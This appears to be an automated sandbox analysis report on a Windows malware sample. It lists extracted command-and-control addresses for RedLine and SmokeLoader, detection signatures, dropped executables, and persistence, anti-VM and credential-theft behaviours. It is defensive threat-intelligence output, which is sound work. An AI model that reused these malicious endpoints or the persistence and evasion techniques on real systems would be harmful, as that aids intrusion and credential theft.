Resubmissions
19-08-2021 18:59 210819-yrzbdtvqln 10
18-08-2021 20:25 210818-4hztrzavcs 10
18-08-2021 17:24 210818-9p8lqjhwv2 10
17-08-2021 06:12 210817-kl4jvaaq7x 10
16-08-2021 10:04 210816-nwc3tqkr3a 10
16-08-2021 10:04 210816-5r5rafnh7e 10
16-08-2021 10:04 210816-kdgh648t5e 10
16-08-2021 09:37 210816-9esgfwsmfe 10
16-08-2021 08:13 210816-26la9rblgn 10
17-08-2021 08:51 210817-w2l5yq2wln
Analysis
max time kernel 111s
max time network 1801s
platform windows11_x64
resource win11
submitted 17-08-2021 08:51
Static task
static1
Behavioral task
behavioral1
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
EB7233922891E1DAD0434FBD52623647.exe
Resource
win11
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
redline
4
213.166.68.170:16810
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
Glupteba Payload 1 IoCs
Processes:
resource yara_rule
behavioral2/memory/4568-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2892 4972 rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6092 4972 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
Processes:
resource yara_rule
C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe family_redline
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe family_redline
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe family_redline
behavioral2/memory/5336-350-0x000001CD1B880000-0x000001CD1B899000-memory.dmp family_redline
behavioral2/memory/4112-379-0x0000000000000000-mapping.dmp family_redline
behavioral2/memory/3876-382-0x0000000000000000-mapping.dmp family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 15 IoCs
Processes:
description pid process target process
PID 4100 created 4828 4100 WerFault.exe rundll32.exe
PID 916 created 4568 916 WerFault.exe Info.exe
PID 6132 created 5388 6132 WerFault.exe FkdTCM26AHjprP7cVvGtWYus.exe
PID 5380 created 5344 5380 askinstall53.exe VBzqFkfsDOMfFiW5eX98wd2t.exe
PID 5564 created 5280 5564 WerFault.exe KV7A28Kr66vqyPcOoBia8YpL.exe
PID 3060 created 5360 3060 vssvc.exe 0OT08f9pu9hybIxDMQ79H_UI.exe
PID 5644 created 5328 5644 WerFault.exe maeApavXFRVyTdV1Ikfwiplv.exe
PID 3968 created 5868 3968 WerFault.exe kGZKvxo6ms4BQ5U8cuw3ZTub.exe
PID 5960 created 5632 5960 WerFault.exe FXxQSNcPioIFIlbegIsf_vj4.exe
PID 5984 created 4112 5984 WerFault.exe 2SXoBBHk0EQOBLgphYL2mbeI.exe
PID 4528 created 1432 4528 msedge.exe kUZysLnJ5VU1GTZZD0uqlySQ.exe
PID 5776 created 5200 5776 WerFault.exe HA0R0oOrvoeWkYK_NWGeEuqA.exe
PID 5984 created 4964 5984 WerFault.exe 7036493.exe
PID 6764 created 5796 6764 WerFault.exe runvd.exe
PID 7100 created 5380 7100 cmd.exe askinstall53.exe
Processes:
resource yara_rule
behavioral2/memory/4568-206-0x00000000015B0000-0x0000000001ED6000-memory.dmp evasion
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe evasion
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe evasion
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe evasion
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe evasion
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule
behavioral2/memory/5388-321-0x0000000004990000-0x0000000004A2D000-memory.dmp family_vidar
behavioral2/memory/5796-547-0x0000000000BE0000-0x0000000000C7D000-memory.dmp family_vidar
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
pid process
5076 KRSetp.exe
4684 Folder.exe
5024 Folder.exe
4568 Info.exe
4584 Installation.exe
5176 ZNjEI97V8_TzeA2vWbShf6jj.exe
5164 uAa_AbxThvGNSkQqNALUo28a.exe
5188 9DiGSOxNcKhW80kKxcL6J5ZA.exe
5200 HA0R0oOrvoeWkYK_NWGeEuqA.exe
5216 mRMKJujcnUvhd7DjNMDCb8eN.exe
5280 KV7A28Kr66vqyPcOoBia8YpL.exe
5304 5VBfkYZvUYTuOQ4AHP9J6iE9.exe
5352 2SXoBBHk0EQOBLgphYL2mbeI.exe
5344 VBzqFkfsDOMfFiW5eX98wd2t.exe
5328 maeApavXFRVyTdV1Ikfwiplv.exe
5336 ABhgA1_JcNSjunWCJULBHWy2.exe
5360 0OT08f9pu9hybIxDMQ79H_UI.exe
5388 FkdTCM26AHjprP7cVvGtWYus.exe
5436 _MiKooJ7I6X_jN040tJwAo75.exe
5428 1xwHsYY6JY2X9HJMmqNaZyN_.exe
5420 4VhdBSLn5e31ry9R4lNsreSR.exe
5476 1qYRY02GWnuOYFefe_sWbDLj.exe
5632 FXxQSNcPioIFIlbegIsf_vj4.exe
5616 sDD53xiAFXf45j9jMPz5AqNg.exe
5624 s9CZCVkwZnCKvuAXID9kjcGG.exe
5608 kUZysLnJ5VU1GTZZD0uqlySQ.exe
5860 LSBnF4NXGH5rmUEXTqMKoFvs.exe
5868 kGZKvxo6ms4BQ5U8cuw3ZTub.exe
5916 9avfIn5IigP_u4pj8JpAtsYA.exe
6100 customer3.exe
1388 md8_8eus.exe
1496 jooyu.exe
4872 jfiag3g_gg.exe
5428 ZNjEI97V8_TzeA2vWbShf6jj.exe
1432 kUZysLnJ5VU1GTZZD0uqlySQ.exe
4112 2SXoBBHk0EQOBLgphYL2mbeI.exe
4964 7036493.exe
3876 5VBfkYZvUYTuOQ4AHP9J6iE9.exe
6052 n06BeJZiAJ9ZGyBXLy2bju0A.exe
6084 11111.exe
4288 3529569.exe
5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp
4104 VC_redist.x64.exe
5648 VC_redist.x64.exe
444 11111.exe
6020 VC_redist.x64.exe
2876 11111.exe
5252 11111.exe
1120 jfiag3g_gg.exe
3292 11111.exe
4164 11111.exe
5484 11111.exe
4680 md9_1sjm.exe
5380 askinstall53.exe
1444 22222.exe
3800 Setup.exe
5796 runvd.exe
1344 MediaBurner2.exe
5380 askinstall53.exe
5492 MediaBurner2.tmp
2308 Cleaner Installation.exe
4192 Versiumresearch.exe
5572 note8876.exe
2080 zhangfei.exe
Processes:
resource yara_rule
behavioral2/memory/1388-332-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _MiKooJ7I6X_jN040tJwAo75.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4VhdBSLn5e31ry9R4lNsreSR.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4VhdBSLn5e31ry9R4lNsreSR.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _MiKooJ7I6X_jN040tJwAo75.exe
Drops startup file 2 IoCs
Processes:
description ioc process
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe
Loads dropped DLL 12 IoCs
Processes:
pid process
4828 rundll32.exe
5336 ABhgA1_JcNSjunWCJULBHWy2.exe
5916 9avfIn5IigP_u4pj8JpAtsYA.exe
5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp
5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp
5648 VC_redist.x64.exe
5916 9avfIn5IigP_u4pj8JpAtsYA.exe
5492 MediaBurner2.tmp
2308 Cleaner Installation.exe
5916 9avfIn5IigP_u4pj8JpAtsYA.exe
5916 9avfIn5IigP_u4pj8JpAtsYA.exe
5724 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule
C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe themida
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe themida
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe themida
behavioral2/memory/5420-354-0x0000000000600000-0x0000000000601000-memory.dmp themida
behavioral2/memory/5436-351-0x00000000004E0000-0x00000000004E1000-memory.dmp themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe
Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6280455.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _MiKooJ7I6X_jN040tJwAo75.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4VhdBSLn5e31ry9R4lNsreSR.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
69 ipinfo.io
79 ip-api.com
148 ipinfo.io
13 ipinfo.io
52 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid process
5420 4VhdBSLn5e31ry9R4lNsreSR.exe
5436 _MiKooJ7I6X_jN040tJwAo75.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
description pid process target process
PID 5176 set thread context of 5428 5176 ZNjEI97V8_TzeA2vWbShf6jj.exe ZNjEI97V8_TzeA2vWbShf6jj.exe
PID 5352 set thread context of 4112 5352 2SXoBBHk0EQOBLgphYL2mbeI.exe 2SXoBBHk0EQOBLgphYL2mbeI.exe
PID 5304 set thread context of 3876 5304 5VBfkYZvUYTuOQ4AHP9J6iE9.exe 5VBfkYZvUYTuOQ4AHP9J6iE9.exe
Drops file in Program Files directory 64 IoCs
Processes:
description ioc process
File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe Setup.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll 9avfIn5IigP_u4pj8JpAtsYA.exe
Drops file in Windows directory 1 IoCs
Processes:
description ioc process
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
pid pid_target process target process
344 4828 WerFault.exe rundll32.exe
4700 4568 WerFault.exe Info.exe
2512 5388 WerFault.exe FkdTCM26AHjprP7cVvGtWYus.exe
5488 5344 WerFault.exe VBzqFkfsDOMfFiW5eX98wd2t.exe
5604 5280 WerFault.exe KV7A28Kr66vqyPcOoBia8YpL.exe
1444 5360 WerFault.exe 0OT08f9pu9hybIxDMQ79H_UI.exe
4832 5328 WerFault.exe maeApavXFRVyTdV1Ikfwiplv.exe
2312 5868 WerFault.exe kGZKvxo6ms4BQ5U8cuw3ZTub.exe
4724 5200 WerFault.exe HA0R0oOrvoeWkYK_NWGeEuqA.exe
5128 4964 WerFault.exe 7036493.exe
6844 5796 WerFault.exe runvd.exe
3696 5380 WerFault.exe askinstall53.exe
6104 5724 WerFault.exe rundll32.exe
4628 5648 WerFault.exe VC_redist.x64.exe
4560 7120 WerFault.exe 6891150.exe
6244 5096 WerFault.exe 5975108.exe
6724 4660 WerFault.exe VC_redist.x86.exe
5056 7024 WerFault.exe InstallShadowVPN.exe
6920 7024 WerFault.exe InstallShadowVPN.exe
5412 1492 WerFault.exe anyname.exe
NSIS installer 2 IoCs
Processes:
resource yara_rule
C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe nsis_installer_2
C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe nsis_installer_2
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache =
0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ZNjEI97V8_TzeA2vWbShf6jj.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr vssvc.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe
